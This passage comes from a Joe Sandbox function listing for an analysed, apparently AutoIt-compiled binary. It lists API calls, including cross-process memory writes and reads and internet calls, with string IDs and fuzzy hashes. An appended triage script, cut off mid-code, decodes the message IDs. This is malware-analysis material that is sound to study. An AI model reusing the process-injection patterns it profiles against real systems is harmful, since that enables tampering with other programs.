                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 00D36BE6
                                                              • Part of subcall function 00D376C4: _memset.LIBCMT ref: 00D376F9
                                                            • _memmove.LIBCMT ref: 00D36C09
                                                            • _memset.LIBCMT ref: 00D36C16
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 00D36C26
                                                            Similarity
                                                            • API ID: CriticalSection_memset$EnterLeave_memmove
                                                            • String ID:
                                                            • API String ID: 48991266-0
                                                            • Opcode ID: 18bae4afd2320a99e7a3732d6abd8a04f17448f7c739613aadc68e1c9e40d1fe
                                                            • Instruction ID: 6324193bd4311bfd04dec48cd92ead390f6cbde71c6cb22c0519812b421851e6
                                                            • Opcode Fuzzy Hash: 18bae4afd2320a99e7a3732d6abd8a04f17448f7c739613aadc68e1c9e40d1fe
                                                            • Instruction Fuzzy Hash: 1DF05E7A200204ABCF416F55DC85A8ABB2AEF45361F048061FE099E227CB31E811DBB5
                                                            APIs
                                                            • GetSysColor.USER32(00000008), ref: 00CD2231
                                                            • SetTextColor.GDI32(?,000000FF), ref: 00CD223B
                                                            • SetBkMode.GDI32(?,00000001), ref: 00CD2250
                                                            • GetStockObject.GDI32(00000005), ref: 00CD2258
                                                            • GetWindowDC.USER32(?,00000000), ref: 00D0BE83
                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00D0BE90
                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 00D0BEA9
                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 00D0BEC2
                                                            • GetPixel.GDI32(00000000,?,?), ref: 00D0BEE2
                                                            • ReleaseDC.USER32(?,00000000), ref: 00D0BEED
                                                            Similarity
                                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                            • String ID:
                                                            • API String ID: 1946975507-0
                                                            • Opcode ID: b60c78b8e8801a453e1ec0f2a6ac2614eeb475b9c4e099a89d86b048df048111
                                                            • Instruction ID: bde5d1cff04341fbb44365558474dadc145399ba2eac59aa1d2a5d0e7ec2502f
                                                            • Opcode Fuzzy Hash: b60c78b8e8801a453e1ec0f2a6ac2614eeb475b9c4e099a89d86b048df048111
                                                            • Instruction Fuzzy Hash: ABE03932104744AADB215F64EC0DBD87F10EB15332F048366FEA9981E187724980DB22
                                                            APIs
                                                            • GetCurrentThread.KERNEL32 ref: 00D2871B
                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,00D282E6), ref: 00D28722
                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00D282E6), ref: 00D2872F
                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,00D282E6), ref: 00D28736
                                                            Similarity
                                                            • API ID: CurrentOpenProcessThreadToken
                                                            • String ID:
                                                            • API String ID: 3974789173-0
                                                            • Opcode ID: 153a26852acac81ee9aea67b475fe373542da9d08f7185d2063e80dcb254d7c3
                                                            • Instruction ID: fe81e0532f933df5f691811a444dabe301c1231a30be4c8fc0340f204e38c0ba
                                                            • Opcode Fuzzy Hash: 153a26852acac81ee9aea67b475fe373542da9d08f7185d2063e80dcb254d7c3
                                                            • Instruction Fuzzy Hash: CBE04F766123219BE7605FB46D0CB573BA8EF607D6F184828AA45CE080DA2484419770
                                                            APIs
                                                            • OleSetContainedObject.OLE32(?,00000001), ref: 00D2B4BE
                                                            Similarity
                                                            • API ID: ContainedObject
                                                            • String ID: AutoIt3GUI$Container
                                                            • API String ID: 3565006973-3941886329
                                                            • Opcode ID: 84280735f248d2b0093f86c07d0721849fc7483ef394274b67ec59c83b265f22
                                                            • Instruction ID: 17bc20337f3e5eb82d6b0c97a492110ef488cba858695a19543beb482c9439e1
                                                            • Opcode Fuzzy Hash: 84280735f248d2b0093f86c07d0721849fc7483ef394274b67ec59c83b265f22
                                                            • Instruction Fuzzy Hash: EB916970600611AFDB14DF64D884A6ABBE5FF58724F24856EE94ACF391DBB0E841CB60
                                                            APIs
                                                              • Part of subcall function 00CEFC86: _wcscpy.LIBCMT ref: 00CEFCA9
                                                              • Part of subcall function 00CD9837: __itow.LIBCMT ref: 00CD9862
                                                              • Part of subcall function 00CD9837: __swprintf.LIBCMT ref: 00CD98AC
                                                            • __wcsnicmp.LIBCMT ref: 00D3B02D
                                                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00D3B0F6
                                                            Similarity
                                                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                            • String ID: LPT
                                                            • API String ID: 3222508074-1350329615
                                                            • Opcode ID: eec31486fe3d5f081ded72535e395cc5e74e15cd2dfb63c9d13bcd444bae03a0
                                                            • Instruction ID: a8d6716683176d043ce3ee43998619e3446618a3bd9919b24668273cb9cf0b83
                                                            • Opcode Fuzzy Hash: eec31486fe3d5f081ded72535e395cc5e74e15cd2dfb63c9d13bcd444bae03a0
                                                            • Instruction Fuzzy Hash: D3618675E00219AFCB14DF94C851EAEB7B4EF09710F14405AFA56AB391D770EE44DB60
                                                            APIs
                                                            • Sleep.KERNEL32(00000000), ref: 00CE2968
                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00CE2981
                                                            Similarity
                                                            • API ID: GlobalMemorySleepStatus
                                                            • String ID: @
                                                            • API String ID: 2783356886-2766056989
                                                            • Opcode ID: 98ac713c285b9814fd4d42376cbc86081e3c7ca72aa2979231c96eedce73b97d
                                                            • Instruction ID: 77895091b86acc2a98923e802250f41a7cc80236ae6d56f99c37dbcab7a9b246
                                                            • Opcode Fuzzy Hash: 98ac713c285b9814fd4d42376cbc86081e3c7ca72aa2979231c96eedce73b97d
                                                            • Instruction Fuzzy Hash: C15137714187449BD320EF10DC86BAFBBE8FB85344F41885EF2D8812A1EB318569DB66
                                                            APIs
                                                              • Part of subcall function 00CD4F0B: __fread_nolock.LIBCMT ref: 00CD4F29
                                                            • _wcscmp.LIBCMT ref: 00D39824
                                                            • _wcscmp.LIBCMT ref: 00D39837
                                                            Similarity
                                                            • API ID: _wcscmp$__fread_nolock
                                                            • String ID: FILE
                                                            • API String ID: 4029003684-3121273764
                                                            • Opcode ID: aa194f7115b8a40ea71bf984428d34106d871c551b9bc0ac1f85604c3bd6dc87
                                                            • Instruction ID: 3520adc7aa61c30c6304d327ba46f12873c452644917a2e8a0025bc9a80046da
                                                            • Opcode Fuzzy Hash: aa194f7115b8a40ea71bf984428d34106d871c551b9bc0ac1f85604c3bd6dc87
                                                            • Instruction Fuzzy Hash: 5341A571A00209BBDF249BE0CC55FEFBBB9DF85710F00046AFA04A7291DAB199049B61
                                                            APIs
                                                            • _memset.LIBCMT ref: 00D4259E
                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00D425D4
                                                            Similarity
                                                            • API ID: CrackInternet_memset
                                                            • String ID: |
                                                            • API String ID: 1413715105-2343686810
                                                            • Opcode ID: 9c9c1a1bae1f215702e01b0e1e22a4f8547696412741d356e76a5f3e0befe224
                                                            • Instruction ID: e523b70ebde32b6a381ce4d039adb1d599f177a60c4e5531f8fd7d288198cf54
                                                            • Opcode Fuzzy Hash: 9c9c1a1bae1f215702e01b0e1e22a4f8547696412741d356e76a5f3e0befe224
                                                            • Instruction Fuzzy Hash: A8310871801119ABCF11EFA4CC85EEEBFB9FF08354F10015AFA15A6262EB319956DB60
                                                            APIs
                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00D57B61
                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00D57B76
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: '
                                                            • API String ID: 3850602802-1997036262
                                                            • Opcode ID: 74074ff609a62b6036fc72a0bec1e923e9c4e72279b4ad49cad730d61ccaa19a
                                                            • Instruction ID: 5b8e9fe23baa789b8eb2d24babc7bbda12140173cf885cb1391f1f61c6e105f5
                                                            • Opcode Fuzzy Hash: 74074ff609a62b6036fc72a0bec1e923e9c4e72279b4ad49cad730d61ccaa19a
                                                            • Instruction Fuzzy Hash: 5941D674A053099FDF14CF65D981BDABBB5FB08301F24016AED08AB355D770AA55CFA0
                                                            APIs
                                                            • DestroyWindow.USER32(?,?,?,?), ref: 00D56B17
                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00D56B53
                                                            Similarity
                                                            • API ID: Window$DestroyMove
                                                            • String ID: static
                                                            • API String ID: 2139405536-2160076837
                                                            • Opcode ID: 342ecbb6a3687c20397abd18bb8247548aae312c8e2421147311d59085296c1e
                                                            • Instruction ID: f2424d8729ecfc6c07d7adfc4cf5f04fbda7e38d266be701d2aca451aae0cb64
                                                            • Opcode Fuzzy Hash: 342ecbb6a3687c20397abd18bb8247548aae312c8e2421147311d59085296c1e
                                                            • Instruction Fuzzy Hash: F6318C71200604AEDF109F64CC80ABB77A9FF48761F54861AFDA9D7290DA30EC85DB70
                                                            APIs
                                                            • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00D29965
                                                            • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00D2999F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: @U=u
                                                            • API String ID: 3850602802-2594219639
                                                            • Opcode ID: d873f0eee0a16deedcbdfb8d3310dfd7b5f585c316f4abb93ec19e43e13c9980
                                                            • Instruction ID: 6de998fcbb872c1dc6fc02167996a0070dbc60c702e57e785df4796edbc74049
                                                            • Opcode Fuzzy Hash: d873f0eee0a16deedcbdfb8d3310dfd7b5f585c316f4abb93ec19e43e13c9980
                                                            • Instruction Fuzzy Hash: 3B21D732D00315ABCF10EBA8D891DBEF7B9EF98714F04416AFA15A7390EA719C418B70
                                                            APIs
                                                            • _memset.LIBCMT ref: 00D32911
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00D3294C
                                                            Strings
                                                            Similarity
                                                            • API ID: InfoItemMenu_memset
                                                            • String ID: 0
                                                            • API String ID: 2223754486-4108050209
                                                            • Opcode ID: 6d2167454a9282d43c48476b4eca88b793f8c676c9d731b79741288fb4778410
                                                            • Instruction ID: 4b844b7a4883a0f27f6e0f06360840385e668008961f44540b5804602dc64bad
                                                            • Opcode Fuzzy Hash: 6d2167454a9282d43c48476b4eca88b793f8c676c9d731b79741288fb4778410
                                                            • Instruction Fuzzy Hash: D8318F31E403099BEB29CF58DD85BBEBBA8EF45350F180029E985A61A1D7709944DF71
                                                            APIs
                                                            • __snwprintf.LIBCMT ref: 00D43A66
                                                              • Part of subcall function 00CD7DE1: _memmove.LIBCMT ref: 00CD7E22
                                                            Strings
                                                            Similarity
                                                            • API ID: __snwprintf_memmove
                                                            • String ID: , $$AUTOITCALLVARIABLE%d
                                                            • API String ID: 3506404897-2584243854
                                                            • Opcode ID: 4cd1081cee68f9bfce9c567536936b78188bff5abf57b56f196ea0f60f98298c
                                                            • Instruction ID: 5ffb31a92da45dc29d4d922ed803f5c0ecdbc41cb2c0b557c059ac524c76923d
                                                            • Opcode Fuzzy Hash: 4cd1081cee68f9bfce9c567536936b78188bff5abf57b56f196ea0f60f98298c
                                                            • Instruction Fuzzy Hash: 46218031640219AFCF11EF68CC82EAE77B5EF44700F540455F945AB281DB30EA45EBB1
                                                            APIs
                                                              • Part of subcall function 00CE603A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00CE6051
                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00D2AA10
                                                            • _strlen.LIBCMT ref: 00D2AA1B
                                                            Strings
                                                            Similarity
                                                            • API ID: MessageSend$Timeout_strlen
                                                            • String ID: @U=u
                                                            • API String ID: 2777139624-2594219639
                                                            • Opcode ID: 95917a8deedb64848f597f1b3f928ae0ef596daa81c67eb358c7702ca09e2875
                                                            • Instruction ID: 9e5ba8e55cd8ce29e1d5d0842c03daea28e3560a3f5b5455eaba68e08ef4dedf
                                                            • Opcode Fuzzy Hash: 95917a8deedb64848f597f1b3f928ae0ef596daa81c67eb358c7702ca09e2875
                                                            • Instruction Fuzzy Hash: 5C1105326002156BCF14BE7CED829BE7BA9CF65708F10002EFA06CB193DD259945D672
                                                            APIs
                                                              • Part of subcall function 00D355FD: GetLocalTime.KERNEL32 ref: 00D3560A
                                                              • Part of subcall function 00D355FD: _wcsncpy.LIBCMT ref: 00D3563F
                                                              • Part of subcall function 00D355FD: _wcsncpy.LIBCMT ref: 00D35671
                                                              • Part of subcall function 00D355FD: _wcsncpy.LIBCMT ref: 00D356A4
                                                              • Part of subcall function 00D355FD: _wcsncpy.LIBCMT ref: 00D356E6
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00D568FF
                                                            Strings
                                                            Similarity
                                                            • API ID: _wcsncpy$LocalMessageSendTime
                                                            • String ID: @U=u$SysDateTimePick32
                                                            • API String ID: 2466184910-2530228043
                                                            • Opcode ID: 7dbe27ca8baa90e89a37b706f66d5fafda1349904710470b423144648c922483
                                                            • Instruction ID: 6725512b79f8ec92ebb2bb0365fc719f9a751eeb74905cc1fdc7fe3503c7d265
                                                            • Opcode Fuzzy Hash: 7dbe27ca8baa90e89a37b706f66d5fafda1349904710470b423144648c922483
                                                            • Instruction Fuzzy Hash: B02106713402086FEF219E54DC82FEE77AAEB44761F680519FD90AB2D0D6B1EC849B70
                                                            APIs
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D2923E
                                                              • Part of subcall function 00D313DE: GetWindowThreadProcessId.USER32(?,?), ref: 00D31409
                                                              • Part of subcall function 00D313DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00D2925A,00000034,?,?,00001004,00000000,00000000), ref: 00D31419
                                                              • Part of subcall function 00D313DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00D2925A,00000034,?,?,00001004,00000000,00000000), ref: 00D3142F
                                                              • Part of subcall function 00D314BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D29296,?,?,00000034,00000800,?,00000034), ref: 00D314E6
                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00D292A5
                                                              • Part of subcall function 00D31487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D292C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00D314B1
                                                            Strings
                                                            Similarity
                                                            • API ID: Process$MemoryMessageSend$AllocOpenReadThreadVirtualWindowWrite
                                                            • String ID: @U=u
                                                            • API String ID: 1045663743-2594219639
                                                            • Opcode ID: cf5276f15d027e7b8467ecf86b98d38e59b2b406f0f75ea4bb4e98c19cb2954c
                                                            • Instruction ID: 3e487e392fb49005f8b333b09a99725b99307c288e60bac1e4eb126d686b2658
                                                            • Opcode Fuzzy Hash: cf5276f15d027e7b8467ecf86b98d38e59b2b406f0f75ea4bb4e98c19cb2954c
                                                            • Instruction Fuzzy Hash: E2219035902229EBEF21DBA4DC81FDDBBB8FF19350F1001A5F948A7190DA715A44DBA4
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00D56761
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00D5676C
                                                            Strings
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: Combobox
                                                            • API String ID: 3850602802-2096851135
                                                            • Opcode ID: 80ca3026ab54f6a5c76ac67af05abd5b78a17a9f8cdd745fef3d20ae1d71e068
                                                            • Instruction ID: d6ce95ec449955291435e5b09a83517b35db4a8ee5af22cad75f201a6ad2a4b4
                                                            • Opcode Fuzzy Hash: 80ca3026ab54f6a5c76ac67af05abd5b78a17a9f8cdd745fef3d20ae1d71e068
                                                            • Instruction Fuzzy Hash: 5F11B271200208AFEF259F54CC80EBB3B6AEB4836AF540229FD1497290D631DC5587B0
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @U=u
                                                            • API String ID: 0-2594219639
                                                            • Opcode ID: 36b4f6946318a0812609fb8933fde989be07f1a9a17a1b2164fcf2f41728ce6a
                                                            • Instruction ID: a2fed9f07bcfbe2d31f706c884a26d597a8d669858743f9edbf1ac3557de5428
                                                            • Opcode Fuzzy Hash: 36b4f6946318a0812609fb8933fde989be07f1a9a17a1b2164fcf2f41728ce6a
                                                            • Instruction Fuzzy Hash: 4F215C35124208FFEF118F64CC65FBAB7A4EB09312F444166FE56DA1E0D671EA189B70
                                                            APIs
                                                              • Part of subcall function 00CD1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00CD1D73
                                                              • Part of subcall function 00CD1D35: GetStockObject.GDI32(00000011), ref: 00CD1D87
                                                              • Part of subcall function 00CD1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00CD1D91
                                                            • GetWindowRect.USER32(00000000,?), ref: 00D56C71
                                                            • GetSysColor.USER32(00000012), ref: 00D56C8B
                                                            Strings
                                                            Similarity
                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                            • String ID: static
                                                            • API String ID: 1983116058-2160076837
                                                            • Opcode ID: 6c95e7eb78232f5b79445a9a1aad6ef70e62742248a6bf45ffba3e5940ed8bf7
                                                            • Instruction ID: cfd2fc43a49b585c3ba7372516331a085eb8743620cceee23d4a9275b1400358
                                                            • Opcode Fuzzy Hash: 6c95e7eb78232f5b79445a9a1aad6ef70e62742248a6bf45ffba3e5940ed8bf7
                                                            • Instruction Fuzzy Hash: 85212672610209AFDF04DFA8CC45AFA7BA9FB08316F044629FD95D3250E735E854DB60
                                                            APIs
                                                            • _memset.LIBCMT ref: 00D32A22
                                                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00D32A41
                                                            Strings
                                                            Similarity
                                                            • API ID: InfoItemMenu_memset
                                                            • String ID: 0
                                                            • API String ID: 2223754486-4108050209
                                                            • Opcode ID: d93cef41e31982e300296de88e42fed21afb54f50a11f6f2c9fbf221609a4652
                                                            • Instruction ID: 6faa357e8b5fc2eb1cb591b6316cecdbd954136789279f69d0cffb4e25022373
                                                            • Opcode Fuzzy Hash: d93cef41e31982e300296de88e42fed21afb54f50a11f6f2c9fbf221609a4652
                                                            • Instruction Fuzzy Hash: 1D11C432D01214ABDF31DF98DC44BBA77B8AB45310F284022E995E72A0D770ED0AC7B1
                                                            APIs
                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00D4222C
                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00D42255
                                                            Strings
                                                            Similarity
                                                            • API ID: Internet$OpenOption
                                                            • String ID: <local>
                                                            • API String ID: 942729171-4266983199
                                                            • Opcode ID: 090c5908798b343177e4d360b4b36404fe2aa1ab6e1f7a1231596407a3c7fcb1
                                                            • Instruction ID: 20b03d08f678fe83c78a7f28426152bdc8952b24ea7ee5740885c2a40ec500ab
                                                            • Opcode Fuzzy Hash: 090c5908798b343177e4d360b4b36404fe2aa1ab6e1f7a1231596407a3c7fcb1
                                                            • Instruction Fuzzy Hash: E8110E70501325BBDB248F118CC8FBBFBA8FF0A352F90822AFA4586100D2B09980D6F0
                                                            APIs
                                                            • SendMessageW.USER32(?,?,?,?), ref: 00D58530
                                                            Strings
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: @U=u
                                                            • API String ID: 3850602802-2594219639
                                                            • Opcode ID: 52c9e544161674018e869cdbbf3f111982af8016fd038476842154a321951b37
                                                            • Instruction ID: 3feba9361fefbc3c2232e8c1c377bfb10a964c2417b2774e42988cbdfec728d1
                                                            • Opcode Fuzzy Hash: 52c9e544161674018e869cdbbf3f111982af8016fd038476842154a321951b37
                                                            • Instruction Fuzzy Hash: F221D375A04209EFCF05CFA8D8408AA7BB5FB4C351B044559FD06E7360EA31ED65EBA0
                                                            APIs
                                                            • SendMessageW.USER32(?,00000401,?,00000000), ref: 00D5662C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: @U=u$button
                                                            • API String ID: 3850602802-1762282863
                                                            • Opcode ID: 41a03179a343b0bbc2bd0f4dece683e5622d9f4565bb20a4f85bd488ce7faf55
                                                            • Instruction ID: 48ea3343359a30cee753ecfb2769462453d06cdfea6d3293e4a0886517e816dd
                                                            • Opcode Fuzzy Hash: 41a03179a343b0bbc2bd0f4dece683e5622d9f4565bb20a4f85bd488ce7faf55
                                                            • Instruction Fuzzy Hash: 9911E172240205ABDF118F60CC51FEA376AEF08315F584618FE91A7190D776EC55AB30
                                                            APIs
                                                            • SendMessageW.USER32(?,0000133E,00000000,?), ref: 00D578D8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: @U=u
                                                            • API String ID: 3850602802-2594219639
                                                            • Opcode ID: d634339678db7e1dbdc298c70585907be54d47e25b17be715556919b3f916fed
                                                            • Instruction ID: 979e0b2722393ac6aaa25037a6ea956310de170086de8084906dd5911a3a00b4
                                                            • Opcode Fuzzy Hash: d634339678db7e1dbdc298c70585907be54d47e25b17be715556919b3f916fed
                                                            • Instruction Fuzzy Hash: D311AC30504744AFDB21CF249891AE7BBE9BF05311F20891DECAA87291DB7169499BB0
                                                            APIs
                                                              • Part of subcall function 00D314BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D29296,?,?,00000034,00000800,?,00000034), ref: 00D314E6
                                                            • SendMessageW.USER32(?,0000102B,?,00000000), ref: 00D29509
                                                            • SendMessageW.USER32(?,0000102B,?,00000000), ref: 00D2952E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$MemoryProcessWrite
                                                            • String ID: @U=u
                                                            • API String ID: 1195347164-2594219639
                                                            • Opcode ID: c4fbd68242d3fd7107e12a119fa21065aeca11da3144e2e693b80dbb03fc3707
                                                            • Instruction ID: 2c60892e46c47b805835520e84568d6810e3279ca89907a85f26bfbc62117414
                                                            • Opcode Fuzzy Hash: c4fbd68242d3fd7107e12a119fa21065aeca11da3144e2e693b80dbb03fc3707
                                                            • Instruction Fuzzy Hash: BF012B32A01218ABDB11AF24EC46EEEBB78DB14310F00416AF915A71D1DB706D54CB70
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock_memmove
                                                            • String ID: EA06
                                                            • API String ID: 1988441806-3962188686
                                                            • Opcode ID: 3901c4a526139b9a65eaf8bca0210a0130ccfe7718dab4a56c6498cfc57a9828
                                                            • Instruction ID: 2145211dd7fe61162bef5010b9235a8bfa67a600c43265ad5008913c2dd11996
                                                            • Opcode Fuzzy Hash: 3901c4a526139b9a65eaf8bca0210a0130ccfe7718dab4a56c6498cfc57a9828
                                                            • Instruction Fuzzy Hash: 1E01F9719042187EDB58CAA8DC16EFE7BF8DB11311F00419AF692D2181E874E6089760
                                                            APIs
                                                            • SendMessageW.USER32(?,00000406,00000000,00000000), ref: 00D295FB
                                                            • SendMessageW.USER32(?,0000040D,?,00000000), ref: 00D2962E
                                                              • Part of subcall function 00D31487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D292C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00D314B1
                                                              • Part of subcall function 00CD7BCC: _memmove.LIBCMT ref: 00CD7C06
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$MemoryProcessRead_memmove
                                                            • String ID: @U=u
                                                            • API String ID: 339422723-2594219639
                                                            • Opcode ID: f9f84157253be28e94277b9ae017a283a79100cc99be220c4d9e28f15c69cb85
                                                            • Instruction ID: 4749a18a9ffdf17b540846bf9dafd1071c0827aed8d318ba60f184317f3d2f3f
                                                            • Opcode Fuzzy Hash: f9f84157253be28e94277b9ae017a283a79100cc99be220c4d9e28f15c69cb85
                                                            • Instruction Fuzzy Hash: 9E016175801118AFDB50AF50DC91EDA77BCFB24341F40C0AAF64996151DE310E89DBA0
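The two records above (Opcode IDs c4fbd682... and f9f84157...) are the only ones in this stretch of the listing in which SendMessageW is paired with WriteProcessMemory or ReadProcessMemory. That pairing is the standard way to drive a common control that lives in another process: messages whose lParam is a pointer (LVM_SETITEMSTATE = 0x102B takes an LVITEM, LVM_GETITEMTEXTW = 0x1073 takes an LVITEM plus text buffer) are not marshalled by USER32, so the caller has to place the structure in the target process first and read the result back afterwards. The helper below is an added triage script, not part of the Joe Sandbox report and not Joe Sandbox code: it parses records in the layout used by this listing, decodes the message IDs to their documented Win32 names (the WM_USER-range values 0x0406 and 0x040D are control-specific and are left as offsets), and flags functions that combine SendMessageW with cross-process memory access. The embedded sample text is an excerpt trimmed from the records on this page; the reading of the pairing as a remote-control idiom is the editor's interpretation, consistent with the "compiled AutoIt script" signature in the overview but not something the report states.

```python
"""Triage helper for a Joe Sandbox function listing (added example, not report output)."""
import re

WM_USER = 0x0400
# Documented Win32 control-message constants (commctrl.h) seen in this listing.
MESSAGE_NAMES = {
    0x1004: "LVM_GETITEMCOUNT",
    0x102B: "LVM_SETITEMSTATE",   # lParam -> LVITEM that must live in the target process
    0x102C: "LVM_GETITEMSTATE",
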